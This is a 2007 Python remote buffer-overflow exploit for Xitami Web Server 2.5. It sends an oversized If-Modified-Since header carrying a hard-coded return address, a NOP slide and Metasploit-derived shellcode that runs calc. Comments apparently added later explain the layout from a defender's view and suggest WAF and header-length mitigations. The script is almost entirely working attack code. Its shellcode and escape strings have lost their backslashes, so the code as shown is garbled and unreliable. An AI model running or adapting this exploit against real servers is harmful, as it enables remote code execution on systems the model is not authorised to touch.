
# Title : Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day)
# Published : 2007-09-24
# Author : h07


#!/usr/bin/python
# Xitami Web Server 2.5 (If-Modified-Since) 0day Remote Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Xitami 2.5c2 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Details:..
#
#     [Module xigui32.exe]
#     If-Modified-Since: Evil, ["A" * 76]rn
#     EIP 41414141
#
#     [Module xitami.exe]
#     If-Modified-Since: Evil, ["A" * 104]rn
#     EIP 41414141
#
# Product Homepage: http://www.xitami.com/
# Just for fun  ;) 
##

from struct import pack
from time import sleep
from socket import *

# Target of the single request below. Both values are hard-coded literals;
# the address is a private (RFC 1918) one, i.e. the author's own lab host.
host = "192.168.0.1"
port = 80

# Payload stage appended after the overwritten return address. The author's
# header note attributes it to a Metasploit "Windows Execute Command (calc)"
# module; nothing in this script inspects or validates it, it is sent verbatim.
shellcode = (
"x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x8dx6cxf6"
"xb2x83xebxfcxe2xf4x71x84xb2xb2x8dx6cx7dxf7xb1xe7"
"x8axb7xf5x6dx19x39xc2x74x7dxedxadx6dx1dxfbx06x58"
"x7dxb3x63x5dx36x2bx21xe8x36xc6x8axadx3cxbfx8cxae"
"x1dx46xb6x38xd2xb6xf8x89x7dxedxa9x6dx1dxd4x06x60"
"xbdx39xd2x70xf7x59x06x70x7dxb3x66xe5xaax96x89xaf"
"xc7x72xe9xe7xb6x82x08xacx8exbex06x2cxfax39xfdx70"
"x5bx39xe5x64x1dxbbx06xecx46xb2x8dx6cx7dxdaxb1x33"
"xc7x44xedx3ax7fx4ax0exacx8dxe2xe5x9cx7cxb6xd2x04"
"x6ex4cx07x62xa1x4dx6ax0fx97xdexeex6cxf6xb2")

# Return-address overwrite, packed little-endian. The author ties this value
# to one specific DLL build (XP SP2, Polish locale) -- it is not a generic
# address, so the same bytes land elsewhere on any other build. From a
# defender's view this is the usual signature of a 2007-era, non-ASLR exploit.
opcode = pack("<L", 0x7CA76981) # jmp esp (shell32.dll / XP SP2 Polish)
jmpcode = "xebx22"            # jmp short +0x22

# Header value layout: 72 filler bytes, then the 4-byte address (76 total,
# matching the xigui32.exe figure in the header note), the short jump, a
# 128-byte slide and the payload. The resulting If-Modified-Since value is
# several hundred bytes long and is not a date at all -- a long run of
# repeated 'A' characters in this header is the obvious detection hook for
# a proxy/WAF rule, and enforcing a sane length plus an RFC-format date on
# If-Modified-Since at the edge is the practical mitigation while the
# vulnerable server is still deployed.
buf = "A" * 72                  # (76 - 4) xigui32.exe
buf += opcode
buf += jmpcode
buf += "x90" * 128
buf += shellcode

# One hand-built HTTP/1.1 GET; only the Host and If-Modified-Since headers
# are set, and the crafted buffer is substituted into the latter via %-format.
header = (
'GET / HTTP/1.1rn'
'Host: %srn'
'If-Modified-Since: Evil, %srn'
'rn') % (host, buf)

# Fire-and-forget: a plain TCP connect, a single send, a 1 s pause, close.
# No response is read and no error is checked, so nothing here observes
# whether the server crashed, rejected the request or simply ignored it.
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(header)
sleep(1)
s.close()

# Printed unconditionally; "DONE" only means the send completed, not that
# anything happened on the target. (Python 2 print statement.)
print "DONE"

# EoF
